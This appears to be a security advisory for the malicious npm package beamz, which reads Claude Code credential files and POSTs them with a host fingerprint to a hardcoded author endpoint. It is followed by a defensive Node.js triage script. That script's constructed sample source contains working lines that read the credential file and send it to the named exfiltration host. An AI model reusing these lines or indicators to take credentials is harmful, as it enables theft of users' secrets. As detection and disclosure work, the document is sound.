Malicious code in beamz (npm)
MAL-2026-5716
Published · Modified
Description
Source: amazon-inspector (c380f1f0fc3c5cf723cd7d92bf41c30f622aafaa633a32f0a78bf91a3a769d2a)
The package advertises itself as a credential-transfer CLI but implements transfer by reading the user's Anthropic Claude Code credentials (~/.claude/.credentials.json, ~/.claude.json) and POSTing them to a single hardcoded author-owned endpoint, https://tfer.jha-anurag2017.workers.dev, with no end-to-end encryption. The same request body includes a precise host fingerprint built in cmdPush (index.js:88-108): os.hostname(), OS username, local IPv4/IPv6, MAC address, public IP, country/city/ISP/timezone (resolved via ipapi.co), CPU model and core count, and total RAM — far more than is necessary to move credentials between a user's own machines. The Worker URL is set in index.js:9 (const WORKER_URL = process.env.BEAMZ_URL || "https://tfer.jha-anurag2017.workers.dev") and the credential read+POST sits in cmdPush (index.js:62-65, 121). The package ships an empty README, so installers have no disclosure that third-party Anthropic credentials and machine identifiers are passing through author infrastructure. The harm fires when the user runs the CLI (beamz push, also the default action), so the trigger is on user invocation rather than at install time, but the destination is hardcoded, author-controlled, and not the user's own server — the silent-relay shape: callers believe they are using a credential-sync tool, and the tool quietly delivers their secrets and a machine fingerprint to the author.
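As an added, defender-side example (not code from the advisory or from the beamz package), the Node.js script below turns the indicators named above (the two credential files, the hardcoded Worker host, the ipapi.co lookup, the os.* fingerprint calls, and the version list from the references) into a static triage of a package's source text; the sample source it scans is constructed, and the heuristics and function names are this example's own assumptions.

```javascript
// Added example (not beamz's own code): static triage for the silent-relay
// pattern MAL-2026-5716 describes: credential-file read, POST to a hardcoded
// endpoint that is not the user's own, plus host fingerprinting.

// Indicators taken from the advisory text.
const CREDENTIAL_PATHS = [".claude/.credentials.json", ".claude.json"];
const KNOWN_EXFIL_HOST = "tfer.jha-anurag2017.workers.dev";
const GEO_SERVICES = ["ipapi.co"];
const FINGERPRINT_CALLS = ["os.hostname(", "os.userInfo(", "os.networkInterfaces(", "os.cpus(", "os.totalmem("];
// Versions named in the advisory's references; versions not listed there are simply unknown here.
const AFFECTED_BEAMZ_VERSIONS = ["1.0.5", "1.0.8", "1.0.11", "1.0.12", "1.0.13", "1.0.14"];

function isAffectedBeamz(name, version) {
  return name === "beamz" && AFFECTED_BEAMZ_VERSIONS.includes(version);
}

// Collect every http(s) URL literal present in the source text (deduplicated).
function findHardcodedUrls(src) {
  const re = /https?:\/\/[A-Za-z0-9.\-]+(?:\/[^\s"'`)]*)?/g;
  return [...new Set(src.match(re) || [])];
}

// Classify one JavaScript source text. "known-malicious" requires the advisory's
// endpoint; "suspicious" requires a credential-file read plus a POST to any hardcoded URL.
function triageSource(src) {
  const urls = findHardcodedUrls(src);
  const credentialReads = CREDENTIAL_PATHS.filter((p) => src.includes(p));
  const fingerprintCalls = FINGERPRINT_CALLS.filter((c) => src.includes(c));
  const geoLookups = GEO_SERVICES.filter((h) => urls.some((u) => u.includes(h)));
  const knownExfil = urls.some((u) => u.includes(KNOWN_EXFIL_HOST));
  const postsOut = urls.length > 0 && /\bmethod\s*:\s*["']POST["']/i.test(src);
  let verdict = "clean";
  if (knownExfil) verdict = "known-malicious";
  else if (credentialReads.length && postsOut) verdict = "suspicious";
  return { verdict, urls, credentialReads, fingerprintCalls, geoLookups };
}

// Constructed sample in the shape the advisory describes; it is NOT the package's code.
const SAMPLE_SOURCE = `
const WORKER_URL = process.env.BEAMZ_URL || "https://tfer.jha-anurag2017.workers.dev";
const creds = fs.readFileSync(path.join(os.homedir(), ".claude/.credentials.json"), "utf8");
const geo = await fetch("https://ipapi.co/json/").then((r) => r.json());
await fetch(WORKER_URL, { method: "POST", body: JSON.stringify({ creds, host: os.hostname(), geo }) });
`;

console.log(triageSource(SAMPLE_SOURCE)); // verdict: "known-malicious"
```

To run it against an installed copy, pass the contents of each .js file under node_modules/beamz to triageSource, and check the installed version with isAffectedBeamz.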
References
- PACKAGE https://www.npmjs.com/package/beamz/v/1.0.11
- PACKAGE https://www.npmjs.com/package/beamz/v/1.0.8
- PACKAGE https://www.npmjs.com/package/beamz/v/1.0.12
- PACKAGE https://www.npmjs.com/package/beamz/v/1.0.5
- PACKAGE https://www.npmjs.com/package/beamz/v/1.0.14
- PACKAGE https://www.npmjs.com/package/beamz/v/1.0.13